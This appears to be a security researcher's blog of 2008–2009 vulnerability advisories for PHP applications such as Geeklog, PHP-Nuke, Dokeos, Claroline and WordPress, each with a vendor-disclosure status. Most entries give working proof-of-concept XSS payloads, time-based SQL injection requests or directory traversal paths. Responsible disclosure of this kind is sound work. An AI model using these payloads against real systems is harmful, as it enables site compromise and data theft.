GSA Security

Geeklog v.1.6.0 Cross-Site Scripting

2009-07-28T16:01:00.005+03:00

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Geeklog (1.6.0)
Product Homepage: http://www.geeklog.net/
Versions Affected: v.1.6.0 (Other versions may also be affected)
Severity: Medium

Input passed to the 'shortmsg' and 'message' POST parameter when posting to '/profiles.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example 1:

POST /profiles.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

what=sendstory&from=x&fromemail=x&to=x&toemail=x&shortmsg=1</textarea><script>alert(1234)</script><textarea>&sid=welcome

will result in:

<td><textarea name="shortmsg" rows="8" style="width:100%">1</textarea><script>alert(1234)</script><textarea></textarea></td>

Example 2:

POST /profiles.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

what=contact&author=x&authoremail=x&subject=x&message=1</textarea><script>alert(123)</script>&uid=2

will result in:

<td><textarea name="message" wrap="physical" rows="10" cols="50">1</textarea><script>alert(123)</script></textarea></td>

Status:
1. Contacted the author at: July 28, 2009 via security email.
2. The author promptly fixed the problem, see at http://www.geeklog.net/article.php/geeklog-1.6.0sr1.

PHP Nuke v.8.0 (referer) SQL Injection

2009-05-27T09:35:00.002+03:00

Author: Gerendi Sandor Attila
Date: May 14, 2009
Package: PHP-Nuke
Product homepage: http://phpnuke.org/
Versions Affected: v.8.0 (Other versions may also be affected)
Severity: High

The 'referer' header element when requesting the '/main/tracking/userLog.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Description:

- Sample request:

GET http://somehost/PHP-Nuke-8.0/index.php HTTP/1.0
Accept: */*
referer: '+IF(False,'',SLEEP(5))+'

This will result in a query like:

INSERT INTO nuke_referer VALUES (NULL, ''+IF(False,'',SLEEP(5))+'')

and the HTTP response will arrive after 5 seconds, replacing the 'False' statement with conditional queries can be used to extract arbitrary data from the database. Also the injection can be used to insert arbitrary data into the 'nuke_referer' table.

Status:
1. Contacted the author at: May 14, 2009 via: http://phpnuke.org/modules.php?name=Feedback
2. No response received (May 27, 2009)
3. According to Evaders99 this vulnerability was already reported in 2007 (http://secunia.com/advisories/cve_reference/CVE-2007-1061/), thanks for the update. Still the downloadable v.8.0 was vulnerable.

Vanilla v.1.1.7 Cross-Site Scripting

2009-05-15T23:50:00.002+03:00

Author: Gerendi Sandor Attila
Date: May 14, 2009
Package: Vanilla (1.1.7)
Product Homepage: http://getvanilla.com/
Versions Affected: v.1.1.7, 1.1.5 (Other versions may also be affected)
Severity: Medium

Input passed to the 'RequestName' header parameter when posting to '/ajax/updatecheck.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:

http://somehost/ajax/updatecheck.php?PostBackKey=1&ExtensionKey=1&RequestName=1<script>alert(123)</script>

will return:

1<script>alert(123)</script>|[ERROR]There was a problem authenticating your post information.

Status:
1. Contacted the author at: May 15, 2009 via http://lussumo.com/
2. The author corrected the problem in the same day (read here).

PHP Nuke v.8.0 Directory Traversal

2009-05-14T13:37:00.003+03:00

Author: Gerendi Sandor Attila
Date: May 04, 2009
Package: PHP-Nuke
Product homepage: http://phpnuke.org/
Versions Affected: v.8.0 (Other versions may also be affected)
Severity: High

The cookie parameter "lang" in "/modules.php" is vulnerable to directory traversal attacks and possibly to arbitrary code inclusion/execution.

Description:
In the mainfile.php we have (lines 3316-333):


if (isset($newlang) AND !stripos_clone($newlang,".")) {
  if (file_exists("language/lang-".$newlang.".php")) {
      setcookie("lang",$newlang,time()+31536000);
      include_once("language/lang-".$newlang.".php");
      $currentlang = $newlang;
  } else {
      setcookie("lang",$language,time()+31536000);
      include_once("language/lang-".$language.".php");
      $currentlang = $language;
  }
} elseif (isset($lang)) {
  include_once("language/lang-".$lang.".php");
  $currentlang = $lang;
} else {
  setcookie("lang",$language,time()+31536000);
  include_once("language/lang-".$language.".php");
  $currentlang = $language;
}

now look at this statement: include_once("language/lang-".$lang.".php"); on Windows we can use as base for directory manipulation nonexistent file names. So assume we have c:\somefile.php and our web server is also installed somewhere on c:\, inserting something like:

/../../../../../../../../../somefile.php

will result in:

include_once('language/lang-/../../../../../../../../../somefile.php');

and the file will be included correctly.

Status:
1. Contacted the author at: May 04, 2009 via: http://phpnuke.org/modules.php?name=Feedback
2. No response where given (May 14 2009).
3. According to Evaders99 this vulnerability was already reported in 2007 (http://secunia.com/advisories/24484/), thanks for the update. Still the downloadable v.8.0 was vulnerable.

Dokeos Free v.1.8.5 Multiple Vulnerabilities

2009-05-13T12:16:00.010+03:00

Author: Gerendi Sandor Attila
Date: April 24, 2009
Package: Dokeos Free 1.8.5 Valparais
Product homepage: http://www.dokeos.com/
Versions Affected: v.1.8.5 (Other versions may also be affected)
Severity: High

SQL Injection:

1. The 'uInfo' parameter from /main/tracking/userLog.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Requires magic_quotes_gpc=OFF, but as you can see here: http://www.php.net/magic_quotes, relying on magic_quotes_gpc=ON feature is highly discouraged .

Proof of concept custom request (SLEEP only works with mySQL > 5.0, but there are many another examples):

http://somehost/main/tracking/userLog.php?uInfo=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)%23

this request will 'hang' for 30 seconds.

The resulting query will be:

SELECT * FROM `wa_dokeos_1_8_5_dokeos_main`.`user` WHERE `user_id` = '1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)#'

executed from get_user_info_from_id.

2. The 'course' parameter from /main/mySpace/lp_tracking.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Exploitation of this is similar with the vulnerability at point 1.
We can also build more complicated injections which will allow us to extract arbitrary data from the database using the true/false condition based sequential extraction mechanism.

XSS (Cross-Site Scripting):

1. The 'curdirpath' parameter from /main/document/slideshow.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

http://somehost/main/document/slideshow.php?curdirpath=1<script>alert(123)</script>

2. The 'file' parameter from /main/exercice/testheaderpage.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

http://somehost/main/exercice/testheaderpage.php?file=1<script>alert(123)</script>

Possible directory traversal ineffective sanitation :

In the 'hotspot_lang_conversion.php' file we have for sanitation the $_GET['lang']:


$search = array('../','\\0');
$lang = str_replace($search,'',urldecode($_GET['lang']));

The sanitation is weak here, on windows /../../../ working as well as ..\..\..\..\..\ and the str_replace does not behave well in this situation to remove the NULL character injected from the url request. On windows a query like this will pass the sanitation:

http://somehost/main/exercice/hotspot_lang_conversion.php?lang=..\..\..\..\..\..\..\todo.txt

Directory traversal:

1.Input passed to the "doc_url" parameter in "/main/exercice/Hpdownload.php" isn't properly verified, before it is used to include files. This can be exploited to read arbitrary files from local resources.

http://somehost/main/exercice/Hpdownload.php?doc_url=..\..\..\..\..\..\..\todo.txt

STATUS:
1. Contacted the author at Aprl 29, 2009 via email.
2. The author released a patch (read here).

Claroline v.1.8.11 SQL Injection

2009-05-12T11:38:00.008+03:00

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: High

The 'sort' parameter from '/claroline/group/group.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Example, the request:

http://somehost/claroline/group/group.php?cidReq=TEST1&sort=IF(FALSE,1,SLEEP(10))&dir=3

will generate the flowing SQL query:

      SELECT * FROM `c_TEST1_group_team` `g`

  # retrieve the tutor id
  LEFT JOIN  `claroline_1_8_11`.`cl_user` AS `tutor`
  ON `tutor`.`user_id` = `g`.`tutor`

  # retrieve the user group(s)
  LEFT JOIN `c_TEST1_group_rel_team_user` AS `ug`
  ON `ug`.`team` = `g`.`id` AND `ug`.`user` = 0

  # count the registered users in each group
  LEFT JOIN `c_TEST1_group_rel_team_user` `ug2`
  ON `ug2`.`team` = `g`.`id`

  GROUP BY `g`.`id`
  ORDER BY IF(FALSE,1,SLEEP(10)) DESC LIMIT 0, 20

This query will lag about 10 seconds. Replacing the FALSE element (from IF(FALSE,1,SLEEP(10))) with conditional queries may be used to extract arbitrary data from the database.

Status:
1. Contacted the author at: May 07, 2009 via http://forum.claroline.net/.
2. The author fixed the problem, read at: Re: Claroline v.1.8.11 SQL Injection

Claroline v.1.8.11 Cross-Site Scripting

2009-05-05T16:25:00.004+03:00

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: Medium

Input passed to the 'Referer' header parameter when posting to '/claroline/linker/notfound.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:

GET /claroline_1_8_11/claroline/linker/notfound.php HTTP/1.0
Accept: */*
Referer: "><script>alert(123)</script><a href="

There are a couple of ways to inject arbitrary text (java script in our case) in the referer header parameter. One of the ways is using a rewrite rule on the remote attacker server. Example .htaccess file:

RewriteEngine  on
RewriteRule ^referer/.*$ test.php [L]

Where the test.php file will be the container of the /claroline_1_8_11/claroline/linker/notfound.php link.

Now a request like: http://remoteatackersite/referer/?"><script>alert(123)</script><a%20href="

will return a page from wich if we call /claroline_1_8_11/claroline/linker/notfound.php we trigger the XSS.

Note: For the first request browsers like IE are required (which does not automatically httpencode the get params)

Status:
1. Contacted the author at: May 05, 2009 via http://forum.claroline.net/.
2. The author promptly (same day) fixed the problem, read at: Re: Claroline 1.8.11 Cross-Site Scripting

Coppermine Photo Gallery v.1.4.21 Cross-Site Scripting

2009-04-30T12:10:00.008+03:00

Author: Gerendi Sandor Attila
Date: April 29, 2009
Package: Coppermine Photo Gallery (cpg1.4.21)
Product Homepage: http://coppermine-gallery.net/
Versions Affected: v.1.4.21 (older versions are also affected)
Severity: Medium

Input passed to the 'css' parameter from '/docs/showdoc.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:

http://somehost/docs/showdoc.php?css=1>">alert(123)%3B

Status:
1. Contacted the author on April 29, 2009.
2. The vendor responded promptly (on April 30, 2009) releasing a security release which fixes the issue, read at:
cpg1.4.22 Security release - upgrade mandatory

PHP Fusion v.6.00.307 Cross-Site Scripting

2008-05-01T12:59:00.005+03:00

Author: Gerendi Sandor Attila
Date: April 23, 2008
Package: PHP Fusion
Product Homepage: http://www.php-fusion.co.uk/
Versions Affected: v.6.00.307 (Other versions may also be affected)
Severity: XSS

Input passed to "subject" parameter in "contact.php" is not properly sanitized before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when malicious data is viewed.

Example:

POST http://somehost/phpfusion_6_00_307/contact.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 127.0.0.1
Content-Length: 115
Cookie: fusion_visited=yes
Connection: Close
Pragma: no-cache

sendmessage=Send%20Message&mailname=x&email=x&subject=<script>alert("xss")</script>&message=x

Status:
1. Contacted the author at April 23, 2008 via http://mantis.php-fusion.co.uk/.
2. No response

Wordpress v.2.3.3 Directory Traversal

2008-04-01T12:43:00.011+03:00

Author: Gerendi Sandor Attila
Date: April 01, 2008
Package: Wordpress
Product Homepage: http://wordpress.org/
Versions Affected: v.2.3.3 (Other versions may also be affected)
Severity: High

The parameter “cat” in “index.php” is vulnerable to directory traversal attacks and possibly to arbitrary code inclusion/execution.

In “template-loader.php” line 35- 37 we have:

else if ( is_category() && $template = get_category_template()) {
include($template);
return;

the $template variable is supplied by the:

function get_category_template() {
$template = '';
if ( file_exists(TEMPLATEPATH . "/category-" . get_query_var('cat') . '.php') )
$template = TEMPLATEPATH . "/category-" . get_query_var('cat') . '.php';
elseif ( file_exists(TEMPLATEPATH . "/category.php") )
$template = TEMPLATEPATH . "/category.php";
return apply_filters('category_template', $template);
}

Here we see, we can inject values after “TEMPLATEPATH/category- ...”.
One interesting 'feature' in Windows XP (possibly in some other OS too) is that we can use an existing file as base for directory traversal. For example path like “c:\boot.ini\..\boot.ini” is valid and will point to “c:\boot.ini”.

So if the Wordpress is running on a box which behave like Windows XP and there is a category template on the server named “category-xx.php” we can include arbitrary php files from the server trough the “cat” parameter.

Example:

If we have template for category 1 (category-1.php)
“http://somehost/worpress/?cat=1.php/../searchform” will include the “searchform.php” from the curent template directory.

Status:
1. Contacted the author on April 01, 2008.
2. Author promptly responded with:
http://trac.wordpress.org/changeset/7586
This will be in our upcoming 2.5.1 release.